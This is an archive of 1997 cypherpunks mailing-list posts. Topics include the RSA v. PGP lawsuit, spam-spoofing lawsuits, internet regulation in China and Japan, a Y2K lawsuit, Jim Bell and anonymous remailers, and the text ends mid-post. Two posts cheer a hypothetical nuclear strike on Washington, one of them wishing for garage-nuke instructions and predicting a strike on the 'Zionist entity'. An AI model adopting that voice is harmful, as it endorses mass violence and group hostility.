Message-ID: <1.5.4.32.19970818235203.0072c230@pop.pipeline.com>



We've added three docs on the RSA v. PGP suit:

A June 4 Stipulation and Order to drop (postpone) a PGP 
motion to compel RSA/PGP arbitration pending arbitration 
between RSA and Caro-Kann on the rights to terminate the 
Lemcom license inherited by PGP:

   http://jya.com/rsavpgp3.htm

The arbitration was scheduled to begin June 18 but no 
documentation on its status is yet available in court files.

Two other procedural docs have been added to the
earlier package of PGP's responses to RSA at:

   http://jya.com/rsavpgp2.htm

We've created an index to the case's docs and will
make items as they arrives, which helpful parties from 
all sides have promised:

   http://jya.com/rsavpgp-files.htm







From rah at shipwright.com  Mon Aug 18 17:18:18 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 19 Aug 1997 08:18:18 +0800
Subject: Grawemeyer World Order Nomination Period
Message-ID: 



I'm sorry, but this was too funny to pass up...

Cheers,
Bob Hettinga

--- begin forwarded text


Date: Mon, 18 Aug 1997 14:49:06 -0400 (EDT)
From: RAPAYN01 at ULKYVM.LOUISVILLE.EDU
Subject: Grawemeyer World Order Nomination Period
To: irtheory_list at unimelb.edu.au

                                          August 18, 1997

Dear Colleagues:

      With this note, I am making several important announcements. First,
the University of Louisville is currently accepting nominations for the 11th
annual Grawemeyer Award in Ideas Improving World Order. Administered by the
Department of Political Science, this award carries a cash prize of one-
hundred fifty thousand dollars ($150,000). Nominations for the 1998
competition must be received by October 31, 1997. The submission process is
relatively simple, nominators must complete a one page form and a nomination
letter. Self-nomination is permitted.

      Second, please also make note of the world wide web home page for the
Grawemeyer World Order Award. This location hosts some material about the
nomination and selection processes and a list of past winners and their prize
winning work. Additional information is added periodically. The address for
the web page is:

      http://www.louisville.edu/ur/onpi/grawemeyer

      Third, I will be attending the APSA meetings next week in Washington
and would be happy to meet with prospective nominees or nominators--or
those curious about the award. You might want to contact me in advance.
Please note that I will not be available on Thursday the 28th. I plan to
distribute copies of our new brochure to relevant publishers and I will
try to place additional copies in a prominent spot.

      For further information, feel free to contact me by e-mail at:
rapayn01 at ulkyvm.louisville.edu; by telephone at (502) 852-3316; by fax at
(502) 852-7923; or by writing in care of the Department of Political Science,
University of Louisville, Louisville, KY, 40292.

      Alternatively, those interested might wish to contact Ms. Arlene
Brannon, who assists in the administration of the award. Her telephone number
is (502) 852-1009, her e-mail address is aabran01 at ulkyvm.louisville.edu; and
she can be reached at the Departmental address and fax number listed above.

                                          Sincerely,

                                          Rodger A. Payne, Ph.D.
                                          Director
                                          Grawemeyer Award for
                                           Ideas Improving World Order

P.S. I apologize to those who receive duplicate copies of this mailing.

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From dlv at bwalk.dm.com  Mon Aug 18 17:39:09 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 19 Aug 1997 08:39:09 +0800
Subject: Grawemeyer World Order Nomination Period
In-Reply-To: 
Message-ID: 



Robert Hettinga  writes:

> I'm sorry, but this was too funny to pass up...
...
>       With this note, I am making several important announcements. First,
> the University of Louisville is currently accepting nominations for the 11th
> annual Grawemeyer Award in Ideas Improving World Order.

I nominate Jim Bell.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From frogfarm at yakko.cs.wmich.edu  Mon Aug 18 17:45:39 1997
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 19 Aug 1997 08:45:39 +0800
Subject: SL33spam2
Message-ID: <199708190053.UAA14669@yakko.cs.wmich.edu>




                                 [1][LINK]
                                      
      [2]index [3]home [4]News [5]audio [6]search [7]help [8]techcity
                               computerworld
                                      
                   Spam attacks send angry firms to court
                       Stewart Deck and Matt Hamblen
                                  08/18/97
        Internet spam is no longer a joke to angry businesses. They
    increasingly are fighting back with civil and criminal lawsuits and
    offering rewards for information leading to arrests. In some cases,
                 users are even trying chargeback tactics.
                                      
    Driving the get-tough attitude is mounting frustration over crippled
      and lost business because of overloaded electronic-mail servers,
   trademark infringement and the nefarious combination of return address
       impersonation known as spoofing and blasts of spamming E-mail
        advertisements. Faced in some instances with death threats,
    exasperated and angry World Wide Web site administrators are trying
    anything and everything including offering bounties for the names of
           spammers and risking online vendettas in the process.
                                      
                               IMAGE AT STAKE
                                      
       Particularly vulnerable to spamming which some observers call
    ``Internet terrorism'' is a company's image, which businesses spend
            untold dollars building, maintaining and protecting.
                                      
    One high-profile example is Samsung America, Inc.'s nightmare, which
   began July 19 when a fake advertisement blasted across the Internet to
   millions of electronic mailboxes. The angry replies caught Samsung by
               surprise it hadn't sent out the advertisement.
                                      
        Other messages bearing Samsung's return address have swamped
     unsuspecting mailboxes since then, including a missive purportedly
        from a Samsung attorney claiming ``fraudulent and actionable
   transgressions'' on the recipient's part. Two of Samsung's Web-hosted
    clients La Costa Resorts and Big Dog Sportswear also had suggestive
       and misleading advertising messages sent out with their names
       attached. They, in turn, have been inundated with complaints.
                                      
    Samsung has been so hard hit getting 6,000 to 10,000 E-mail messages
     per day and hundreds of telephone calls worldwide that the FBI is
   looking into the matter. Samsung has spent millions of dollars on its
          brand image and desperately wants the spamming to stop.
                                      
   ``We assume whoever is doing this buys lists of E-mail addresses from
   someone,'' said Sang Cho, Samsung's in-house counsel, in an interview
   with Computerworld. But the company doesn't know why or who holds the
       grudge. It intends to file civil and criminal charges when the
                          perpetrator is unmasked.
                                      
      Fake ads are the latest twist in spoofing and spamming. The Dr.
   Seussian terms describe an underhanded sneak attack that tries to get
        ads in front of as many unsuspecting eyeballs as possible by
      impersonating a responsible sender. For example, Strong Capital
     Management, Inc., a financial services company in Menomonee Falls,
   Wis., is suing a spammer for allegedly stealing its address, thinking
    that recipients would be more likely to open mail from a prestigious
       firm than an ordinary Internet marketer. Such mail is hated by
          recipients and is a bane of Internet service providers.
                                      
                               FIGHTING BACK
                                      
   But now the impersonated legions are beginning to fight back. Although
   there are no results in any of these cases yet, here is a sampling of
            businesses going on the offensive with their beefs:
                                      
   Two operators at SFF Net, a commercial online service used by science
    fiction and fantasy writers, have filed suit in Kings County, N.Y.,
     against Carlos Lattin for sending out spamming E-mails with their
   forged return addresses. Their lawsuit claims trademark infringement,
    unfair competition, defamation and false designation of origin. The
      plaintiffs used New York laws to make the alleged impersonator's
              Internet service provider divulge Lattins name.
                                      
    A novice junk mailer was sued in May by an online floral information
    service run by Tracy LaQuey Parker, an Internet author and education
    market development manager at Cisco Systems, Inc. Parker opened the
    site's electronic mailbox one morning in March and saw what Samsung,
   La Costa and SFF Net have experienced: an avalanche of returned E-mail
    and angry letters. ``I was shocked by the onslaught,'' Parker said.
                                      
    Jon Tara, operator of San Diego's Live.Net site, has experienced the
      same problem, but he hasn't been able to track down the spoofing
      impersonator. He is offering a $100 reward for positive personal
   identification of the spoofer. A message on the site from Tara to the
    spamming perpetrator says, ``I am going to hound you to the ends of
    the earth once I find out who you are. You will regret having used a
    Live.Net return address. If you are lucky, I will never find out who
    you are. If you are unlucky, I will. It will be the worst luck that
     you've ever had.'' Tara has fought with a service provider who has
     stopped shutting down spammers and wont provide Tara with identity
    information, claiming privacy requirements. The provider has called
                      Taras bounty offer vigilantism.
                                      
     In February, Matthew Seidl, a Colorado University computer science
     student, filed a lawsuit against Greentree Mortgage and an unnamed
    bulk E-mailer for allegedly sending out a batch of spam with Seidl's
   ``nobody at localhost.com'' address in the From and Return-Path headers.
                                      
    Seidl said in an Internet posting that he decided to take ``whatever
   legal actions we have to take to restore our good name and recover the
   damages we suffered. We are doing our part to put an end to this type
                              of net abuse.''
                                      
                              UNLIMITED ACCESS
                                      
    Such attacks are difficult to deal with, said Nina Burns, an analyst
   at Creative Networks, Inc. in Palo Alto, Calif. ``Wackos have so much
    access to information that it becomes scary for an individual,'' she
     said. ``But until authentication and digital signature technology
         become more widespread, I'm not sure what the answer is.''
                                      
    ``We need some sort of digital Caller ID,'' said Jonathan Wheat, an
   analyst at the National Computer Security Association in Carlisle, Pa.
          Until then, Wheat said, this may be the price we pay for
                   ever-increasing Internet connectivity.
     _________________________________________________________________
                                      
                            See related stories:
     * [9]Service providers won't release names
     * [10]Internet providers fight back against spammers
       
   [11]index [12]home [13]News [14]audio [15]search [16]help [17]techcity
                               computerworld
                                      
                                 [18][LINK]
                                      
   Copyright � 1997 @Computerworld. All rights reserved. Reproduction in
     whole or in part in any form or medium without express [19]written
       permission of @Computerworld is prohibited. Computerworld and
         @Computerworld and the respective logos are trademarks of
                            Computerworld, Inc.

References

   1. http://ads01.focalink.com/SmartBanner/page/9.1.3.1-290
   2. http://www.computerworld.com/home/toc.html
   3. http://www.computerworld.com/index.html
   4. http://www.computerworld.com/news/index.html
   5. http://www.computerworld.com/realaudio/index.html
   6. http://cwlive.cw.com:8080/home/search.nsf/FtFieldSearch?OpenForm
   7. http://www.computerworld.com/help/index.html
   8. http://www.computerworld.com/techcity/index.html
   9. http://cwlive.cw.com:8080/home/print9497.nsf/31a3dd8c957f7b92852564b8006f7278/5f477c29d347b2ad852564f7004090df?OpenDocument
  10. http://cwlive.cw.com:8080/home/print9497.nsf/31a3dd8c957f7b92852564b8006f7278/29bda244c62754ed852564f7004090f1?OpenDocument
  11. http://www.computerworld.com/home/toc.html
  12. http://www.computerworld.com/index.html
  13. http://www.computerworld.com/news/index.html
  14. http://www.computerworld.com/realaudio/index.html
  15. http://cwlive.cw.com:8080/home/search.nsf/FtFieldSearch?OpenForm
  16. http://www.computerworld.com/help/index.html
  17. http://www.computerworld.com/techcity/index.html
  18. http://ads01.focalink.com/SmartBanner/page/9.1.4.1-436
  19. http://cwlive.cw.com:8080/home/print9497.nsf/All/home/copyright.html






From frogfarm at yakko.cs.wmich.edu  Mon Aug 18 17:47:06 1997
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 19 Aug 1997 08:47:06 +0800
Subject: 3.html
Message-ID: <199708190052.UAA14661@yakko.cs.wmich.edu>




   [1]SIDEBAR 
   
                          [2]Newsbytes Advertising
                                      
China Internet Roaming Hit By Clampdown

   ****China Internet Roaming Hit By Clampdown 08/18/97 HONG KONG, CHINA,
   1997 AUG 18 (NB) -- By Neil Taylor, IT Daily. Business travelers in
   China have had their Internet access hit by severe restrictions placed
   on roaming services by authorities.
   
   The trouble began a month ago, after officials began examining access
   services provided by Equant, a division of international airline
   network service provider SITA.
   
   Sources within SITA were unable to confirm the precise circumstances,
   but it appears that officials from within China's Posts Telephone and
   Telegraphs administration were unhappy with the fact that the company
   was reselling access to third parties including iPass, CompuServe and
   America Online.
   
   As a result, Equant was forced to suspend much of its non-airline
   business, including Internet roaming services. "We had to basically
   cut back on non-airline users, so this could be a case of our having
   to cut off some of the dead wood to save the airline side," a SITA
   executive admitted.
   
   "Our relationship with China is kind of up and down. It's not with the
   government; we get along with them fine; it's with the local PTTs," he
   added.
   
   The restrictions meant that iPass lost its points of presence (POPs)
   in Guangzhou, Tianjin, Shanghai and Xiamen. Following the closures,
   iPass also suspended POPs in Brunei, Cuba, French Polynesia, India,
   Burma, Saudi Arabia, Thailand and Vietnam.
   
   Among iPass partners affected by the clampdown, Hong Kong ISPs are
   likely to be worst affected. But Abel Lau, president of Hong Kong ISP
   I-Wave, said his company had not been badly hit by the problem.
   
   "We do not have many users in China, and they've been using access in
   Beijing, so we haven't had many problems." I-Wave estimates that
   "maybe one percent" of its members use iPass roaming services in
   China.
   
   Chris Moore, president and CEO of iPass, said his company would soon
   announce solutions for affected customers. "We are actively working on
   expanding our access in China," he said." We have several access
   points in Beijing and anticipate coverage in Shanghai, southern China
   and other parts of the country very soon."
   
   "We know China is a very important market," Moore told Newsbytes. "We
   were working with providers there before this situation arose. We have
   always been committed to that market and want to develop strong and
   lasting relationships with the right organizations. Our relationship
   with Equant (SITA) remains strong, this is an issue we worked closely
   on."
   
   (19970819/ Reported By Newsbytes News Network:
   [3]http://www.newsbytes.com /CHINASCREEN/PHOTO)
   
   [4]Copyright �Newsbytes News Network. All rightsreserved. For more
   Newsbytes see http://www.newsbytes.com.
   
         [5]Home | [6]Daily | [7]Weekly | [8]Publishers | [9]Search

References

   1. http://www.newsbytes.com/menus/navbar.map
   2. http://www.newsbytes.com/OAS/rm/try-it.cgi/www.newsbytes.com/home.html
   3. http://www.newsbytes.com/
   4. http://www.nbnn.com/copyrght.html
   5. http://www.nbnn.com/home.html
   6. http://www.nbnn.com/news/s_daily.html
   7. http://www.nbnn.com/news/s_week.html
   8. http://www.nbnn.com/publishers/publi_1.html
   9. http://www.nbnn.com/html_p/search.html






From frogfarm at yakko.cs.wmich.edu  Mon Aug 18 17:48:11 1997
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 19 Aug 1997 08:48:11 +0800
Subject: 230_081897_112201_31203.html
Message-ID: <199708190054.UAA14676@yakko.cs.wmich.edu>




                                 [1][ISMAP]
                                      
                                 [2][LINK]
                                      
               [3]Click here for Microsoft Intranet Solutions
                                      
                        [4]Content For Your Intranet
                                      
        [5]Click here for Microsoft Internet Explorer 4.0 Preview 2
                                      
         Commentary: In Japan, Moves to Regulate the Net [6][LINK]
                                 [7][LINK]
                              By TOMOKO SAITO
                         c.1997 Asahi News Service
                                      
     T he following commentary appears in Asahi Shimbun, one of Japan's
                            leading newspapers:
                                      
                                   -----
                                      
      Abusive uses of the Internet, such as the illegal posting of the
       photograph and name of a juvenile suspect in recent Kobe child
    killings, have spurred government officials to consider bringing the
                     Net under some kind of regulation.
                                      
    Violations of privacy and libel cases began increasing conspicuously
   last year, giving rise to calls for the companies that provide access
                to the Internet to adopt voluntary controls.
                                      
   In February last year, a Tokyo company employee who opened a home page
   with a Japanese provider was arrested by the Tokyo Metropolitan Police
      Department on charges of displaying obscene images. A series of
                        arrests was made elsewhere.
                                      
      This spring, advisory bodies to the Posts and Telecommunications
       Ministry and the Ministry of International Trade and Industry
                  recommended that some rules be drafted.
                                      
    The Telecom Services Association of Japan, a trade body having about
      400 providers as members, drew up draft guidelines for voluntary
      regulation. The guidelines call for providers to take action for
             improvement in response to complaints from users.
                                      
          Some providers have drafted manuals for self-regulation.
                                      
   The circulation of the Kobe student's photograph and his real name on
     the Net had a particularly strong impact, prompting authorities to
            think that voluntary regulations may be inadequate.
                                      
   But official regulation could deprive the Internet of its good points.
     The best thing about the Net is that it enables people to exchange
          information freely. That is why it has grown so rapidly.
                                      
   There are areas where new systems are needed to protect users, such as
      electronic financial transactions. But in areas relating to the
   freedom of expression, a cautious approach is required in dealing with
    abuses, so that the good points of the Internet will not suffer from
                                regulation.
                                      
    What is unique about the Net is that anyone, in addition to being a
      recipient of information through the system, can easily become a
    supplier of information. That becomes possible for anyone who owns a
       personal computer, a communications modem and has access to a
    telephone circuit. A contract signed with a provider enables him or
                 her to open a home page on the Net freely.
                                      
    Popular home pages have thousands of accesses a day, which gives an
             individual the influence of a publishing company.
                                      
   The Internet has the potential of transforming contemporary society in
       which those who send out information - such as newspapers and
   television stations - are separate from those who receive it - such as
                             people in general.
                                      
   In Europe, calls to bring the Net under control started to mount last
     year. In Germany, a so-called multimedia law was passed in July to
      stipulate the scope of providers' responsibility in dealing with
     troubles, such as human rights violations and libel cases. The law
    requires providers to appoint officials to handle complaints or give
    advice on the impact on juveniles of violent and obscene information
                                on the Net.
                                      
   Also in July, a working group set up by the Organization for Economic
       Cooperation and Development held its first meeting to discuss
    international cooperation to bring the Net under control. France and
        Belgium were particularly vocal in calling for such a group.
                                      
   Compared with the Europeans, the Americans are more inclined to leave
        the matter of regulation to private initiatives. The Clinton
   administration's proposal to regulate indecent images on the Net under
   the telecommunications act ran into objections on the grounds that it
    could infringe on the freedom of expression. The Supreme Court ruled
              in June that the proposal was unconstitutional.
                                      
    In Japan, the constitutional guarantee of the freedom of expression
       naturally extends to individuals who supply information on the
   Internet. It follows that any kind of censorship about Net information
    should not be tolerated. Whether a certain expression is appropriate
    or not should be left up to people to determine in the ''freedom of
                             thought'' market.
                                      
     Any attempt to force informal controls on providers should also be
   resisted, given the important role played by them as media in addition
                     to being ''communications'' firms.
                                      
   As for the question of controlling obscene images, efforts to dissolve
    the gaps that have developed between the law and reality should come
     first. Porn books that are brought back from abroad are seized by
     customs officers, and a Japanese who opens a home page that shows
       nudes can be punished. But it is easy to access a more radical
    American home page, and no legal punishment awaits those who look at
                   the images such a home page provides.
                                      
   The punitive provisions should be reexamined to determine whether they
     are really needed if people who do not want to see pornography are
                      assured that they can avoid it.
                                      
   Of course, young people must be protected. A system that blocks access
   to porn and violence on the Net, when mounted in personal computers at
     home or at school, is being introduced in Western countries. Japan
   should consider following their example, but I believe whether or not
   to use it should be left up to the judgment of each household that has
                                acquired it.
                                      
     ``Let us wait for the new media to mature by thoroughly educating
    information suppliers on their responsibility,'' said Jiro Makino, a
       lawyer familiar with Net troubles. What he has in mind is that
   suppliers who operate on the basis of the freedom of expression should
    have a high ethical standard and be prepared to take responsibility
                   for the consequences of their actions.
                                      
      I believe that is what it takes to head off state interference.
                                      
                                   -----
                                      
    (The author is a reporter for Asahi Shimbun's City News Department.)
                                      
                           NYT-08-18-97 1104EDT<
                                      
                            [8][LINK] [9][LINK]
                                      
    [10]More News | [11]Keyword Search | [12]Hot Topics | [13]Discussion
                     Groups | [14]Bill Gates | [15]Home

References

   1. http://nytsyn.com/cgi-bin/imagemap/cndnews
   2. http://nytsyn.com/cgi-bin/link/link_beyond1?url=http://www.beyondcomputingmag.com/current/inprint.html
   3. http://nytsyn.com/cgi-bin/link/link_sb6i1a?url=http://www.microsoft.com/backoffice/promo/intraneti/
   4. http://nytsyn.com/cgi-bin/link/link_interactive?url=http://nytsyn.com/content
   5. http://nytsyn.com/cgi-bin/link/link_exclusive?url=http://www.microsoft.com/ie/partners/?/ie/partners/prevuser.asp
   6. http://nytsyn.com/live/Latest/230_081897_112208_31244.html
   7. http://nytsyn.com/live/Latest/230_081897_110009_25840.html
   8. http://nytsyn.com/live/Latest/230_081897_112208_31244.html
   9. http://nytsyn.com/live/Latest/230_081897_110009_25840.html
  10. http://nytsyn.com/live/Latest_columns
  11. http://nytsyn.com/live/cndkey.html
  12. http://nytsyn.com/live/cndtopics.html
  13. http://nytsyn.com/live/cnddiscuss.html
  14. http://nytsyn.com/live/Gates2
  15. http://nytsyn.com/live/Latest






From anon at anon.efga.org  Mon Aug 18 17:58:31 1997
From: anon at anon.efga.org (Anonymous)
Date: Tue, 19 Aug 1997 08:58:31 +0800
Subject: None
Message-ID: 



At 12:26 AM 8/19/97 +0100, you wrote:
>Cypherpunks are individuals.

No shit.

>Pick 10 cypherpunks, you'll get 10 different views.

Well, that may be a no shitter.

>Don't see the need to disclaim non-cypherpunk status due to
>`bloodlust'...  Are you anticipating that the list readership will be
>collectively locked up for non-government approved thoughts?

They're not taking my ass alive, or at all.

>Are you sure that having a 10 mile crater where there used to be a
>bunch of power-crazed beaurocrats wouldn't be a net improvement :-)?

It would truly be a day to celebrate.

>It's not as if anyone is planning to nuke them anyway, it's just
>invective.  There might be some danger of some of us writing a bit of
>crypto code, or saying some negative things about politicians.  No
>laws against either of those (yet).

Just wait until they can read thoughts.  Man, that'll be a sight to see.

>A lot of the systematic torture, intimidation, carried out by 3rd
>world dictatorships is done at the hands of CIA trained government
>employees.

Well, since they can't read thoughts yet, that's the best way.

It would be a day to celebrate loudly if someone put a crater in DC.






From enoch at zipcon.net  Mon Aug 18 18:11:05 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Tue, 19 Aug 1997 09:11:05 +0800
Subject: Bell, etc
Message-ID: <19970819005657.29906.qmail@zipcon.net>



Tim "What you mean *WE*, white man" May writes:

 > Whom are the "we" in this "We really need to put something
 > together..."?

 > I certainly don't plan to be part of the "we," and this
 > sounds perilously close to the notion that members of this
 > mailing list are part of some sort of collective entity,
 > with goals, charters, action plans, officers, oh my.

Horrors.

 > As for info on Jim Bell, the article by Declan is widely
 > available, and is quite informative. As for elaborating it
 > further, or including more boilerplate, this seems
 > pointless. Anyone knew to the story can read Declan's
 > article. Anyone seeking even more information presumably
 > knows how to use search engines and should be able to find
 > the various essays and articles directly.

Well, as I have often said, "There is no such thing as objective
market-driven journalism." As much as I admire Declan's
expository skills, we both know he isn't going to deliberately
bite the hand that is holding his paycheck.

 > Sounds good to me. Let us know when you've finished it.

 > (If I sound testy, sorry. It's just that it's been a while
 > since I've heard this "we should get together and so
 > suchandsuch" stuff. The notion that Cypherpunks are some
 > sort of collective is not real useful. Nor is building a
 > page devoted to Bell's "one trick pony" terribly
 > interesting. Yes, people are clueless and ask "Who is Jim
 > Bell?"

Jim Bell is an example of an individual screwed by the government
using overly vague statues for alleged crimes which amounted to
little more than a few high school type pranks.

He took names of assholes who harrassed him, gave a made-up
number to a few people, and made the IRS doormat smell bad.  How
much, if any taxes, were evaded as a result of one of these
charges isn't even an issue.

 > So? Tell them to use search engines; a HotBot search on
 > "James Dalton Bell" just returned 1078 matches, several of
 > them on the first page directly applicable. Obviously
 > various Boolean searches on AP, Bell, IRS, etc. would act in
 > the predictable way.)

It is in the collective interests of Crypto-Anarchists that
information depicting the government's true colors should be
available in a form which can be accessed by even the terminally
innumerate.  This means a hyperlink with the words "Jim Bell" on
it, in a frequently browsed location.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From shamrock at netcom.com  Mon Aug 18 18:16:39 1997
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 19 Aug 1997 09:16:39 +0800
Subject: Alex le Heux
In-Reply-To: <199708181919.VAA19973@xs2.xs4all.nl>
Message-ID: 



On Mon, 18 Aug 1997, Zooko Journeyman wrote:

> 
>  A million monkeys operating under the pseudonym
>  "Alex le Heux " typed:
> >
> 
> 
> 
> Hey HEY!  It's the man who nearly managed to single-handedly 
> derail the PGP legal export hack by playing the block rocking 
> beats (all vinyl) which inspired the vacationing hackers to 
> spill the drinks on the source books.

Without Alex, there wouldn't really have been a Cypherpunks party tent 
to do the hack in. Well, the tent might have been there, but there would 
have been less fun and certainly not as many good looking women. And 
besides, how could one hack without music?

--Lucky






From dlv at bwalk.dm.com  Mon Aug 18 18:29:50 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 19 Aug 1997 09:29:50 +0800
Subject: Picketing With Packets
In-Reply-To: <97Aug18.160626edt.32257@brickwall.ceddec.com>
Message-ID: <68RNBe10w165w@bwalk.dm.com>



nospam-seesignature at ceddec.com writes:

> On Sun, 17 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > Observation 1: it's much easier to get ON their junk mail list
> > then to get OFF of it.
>
> There are two lists, or more properly one list - the remove list.  The
> "ON" list is whatever cyberbomber or emailblaster, etc. generates.

It's interesting to note that thir very popular address
harvesting program was posted for free by the guy who sells an
e-mail filtering program.

> They are supposed to run the outbound mail through the remove list filter.
> And take action against anyone who doesn't.

I put a lot of bwalk mailboxes on the iemmc's off list, and I still
get a lot of shit in those mailboxes, stating in the header
'x-ad: see iemmc for removal instructions". Fucking liars.

> > Observation 2: if you enter the same userid several times, you
> > get several different numbers in the mail; all of them work
> > (not just the latest)
>
> All returned numbers give the same effect.  One day that changed from "The
> token you entered was invalid, try again or restart with your name" to
> "That user id removal is already in progress - please try again in 24
> hours".

That must be a recent development. I broke my Web browser and
can't look t it. [If I had realized what a buggy piece of shit NT
is, I would have kept OS/2 on bwalk and installed NT on another
box. :-( . Learn from my mistakes folks - NT sucks, OS/2 rulez.]

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Mon Aug 18 18:35:56 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 19 Aug 1997 09:35:56 +0800
Subject: None
In-Reply-To: 
Message-ID: <23sNBe14w165w@bwalk.dm.com>



Anonymous  writes:

...
> It would be a day to celebrate loudly if someone put a crater in DC.

I'd love for this to happen!  I wish someone would condense the instructions
for making nukes in one's garage into 4-6 lines suitable for .sigs.

But I suspect that the Zionist entity will get nuked before Washington DC.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From vznuri at netcom.com  Mon Aug 18 18:43:15 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Tue, 19 Aug 1997 09:43:15 +0800
Subject: first y2k lawsuit hits in london
Message-ID: <199708190133.SAA08670@netcom7.netcom.com>




------- Forwarded Message


Millennium bomb: Supplier sued over cash
                   registers

                   MONDAY AUGUST 18 1997

                   By Christopher Adams in London

                   A small supermarket owner in the US is suing a cash
register supplier for
                   allegedly providing computerised tills that cannot
recognise the year 2000.

                   The lawsuit is believed to be the first of its kind.
If it is successful, it could
                   set a precedent with dangerous consequences for the
insurance industry.

                   Mark Yarsike, a supermarket owner in Detroit, is
suing Tec-America, the
                   Atlanta-based supplier of cash registers, because he
says credit cards that
                   expire after 2000 cause the tills to shut down.

                   The lawsuit has wide implications for the insurance
industry as suppliers
                   may be forced to make claims on insurance policies
covering them against
                   the failure of their products to cope with the date
change.

                   Legal experts say insurers might be inundated with
claims over the
                   so-called "millennium bomb", leaving them vulnerable
to losses that could
                   run to billions of pounds.

                   The millennium bomb is expected to cause widespread
chaos because
                   most computers recognise only the last two digits of
a year and will treat
                   dates beyond 1999 as referring to the 1900s.

                   Should litigation escalate, the cost of claims could
be inflated by damages
                   and legal fees.

                   Mr Yarsike owns three Produce Paradise supermarkets
in Detroit. He
                   says the cash registers have failed more than 150
times in two years,
                   causing chaos in his stores and losing him hundreds
of thousands of dollars.

                   Mr Yarsike says his patience with Tec-America finally
snapped two weeks
                   ago. He says that each time credit cards expiring
after 2000 cause cash
                   resisters to shut down, Tec-America comes to fix the
problem. But within
                   hours, the registers fail again.

                   "It's gotten pretty wild in here. A lot of customers
walk out upset and
                   embarrassed.

                   When the card zips through and the modem packs up,
everybody looks at
                   that one customer and says, 'Wow! What did she do?'.

                   "How would you like to have 300 people in your store
and the cash
                   registers don't work with a 10-hour day ahead of
you?"

                   Mr Yarsike wants Tec-America to put in a replacement
system. He spent
                   $150,000 on the fleet of registers for his stores and
says it would cost him
                   another $35,000 for new equipment.

                   Tec-America denied it was to blame for the shutdown
of the cash
                   registers.

                   It said responsibility lay with the credit card
industry, which was forced
                   several years ago to establish a format for swapping
data that would
                   recognise the year 2000.

                   The industry's efforts, however, were not completed
until April.


- ------- End of Forwarded Message


------- End of Forwarded Message






From gbroiles at netbox.com  Mon Aug 18 19:37:52 1997
From: gbroiles at netbox.com (Greg Broiles)
Date: Tue, 19 Aug 1997 10:37:52 +0800
Subject: Jim Bell web pages
Message-ID: <3.0.3.32.19970818193205.007f61c0@mail.io.com>




I've got my original page with the scans of the search
warrant/affidavit/return at , and a
second page collecting various links to media reports, etc., at
.

The Columbian (Jim's hometown paper) has a number of articles about him and
the progress of his case at
. There are also
some miscellaneous documents that the Columbian may or may not intend to
make available to the public available at
 (I don't think they realize
that a directory without an index document will return a directory list. :)

John Young has collected several documents re Jim, which are cataloged at
the beginning of the document at . 


--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles at netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.






From pooh at efga.org  Mon Aug 18 20:55:40 1997
From: pooh at efga.org (Robert A. Costner)
Date: Tue, 19 Aug 1997 11:55:40 +0800
Subject: Anonymous Remailers
In-Reply-To: <3.0.3.32.19970818193205.007f61c0@mail.io.com>
Message-ID: <3.0.3.32.19970818234422.038013f4@mail.atl.bellsouth.net>



-----BEGIN PGP SIGNED MESSAGE-----

I'd appreciate some EMAIL comments on what anonymous remailers are used for, 
in particular the remailer at anon.efga.org.

The "Georgia Cracker" remailer, like any remailer, has had several people 
complain about it's existence.  While I've received various emails telling me 
the remailer is a bad thing, including veiled legal threats, I've yet to see 
even one note that tells why it is a good thing.  I'd appreciate some 
comments on why the system should be maintained.

There are two main reasons for this.  First, I need to explain to others at 
EFGA why this remailer is being maintained.  Secondly, I need to write an 
affidavit explaining why the remailer should not be shut down.  I'd really 
appreciate anyone who has used anon.efga.org EMAILing me with what purpose it 
serves.  Anonymous comments are of course very welcome.

Thanks,


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQBVAwUBM/kWkkGpGhRXg5NZAQEV5wH/f/3WGKDWAJVjE8UeGojp3xE5IMNAstq4
lZJc+C9vAlF5knO5r5ODym8aecXF1+EsU+xta8809+BSGARTrDvAkw==
=VZW0
-----END PGP SIGNATURE-----

  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh at efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key






From tcmay at got.net  Mon Aug 18 20:57:35 1997
From: tcmay at got.net (Tim May)
Date: Tue, 19 Aug 1997 11:57:35 +0800
Subject: Cypherpunks as a Terrorist Organization
In-Reply-To: <199708181919.VAA19973@xs2.xs4all.nl>
Message-ID: 



At 12:19 PM -0700 8/18/97, Zooko Journeyman wrote:

>P.P.S.  No really-- I'm _not_ a cypherpunk, because cypherpunks
>appear to be overwhelmed with blind, self-destructive
>bloodlust since 1996 or so.  I'm just here to try talking some
>sense into the salvageable ones.

Yes, "B.", so you keep saying.

Fact is, many who remain on the list are reacting to government actions
which are far more "intense" than what we had seen in the 1992-4 period.
Things like the doublespeak of "mandatory voluntary" programs, the probable
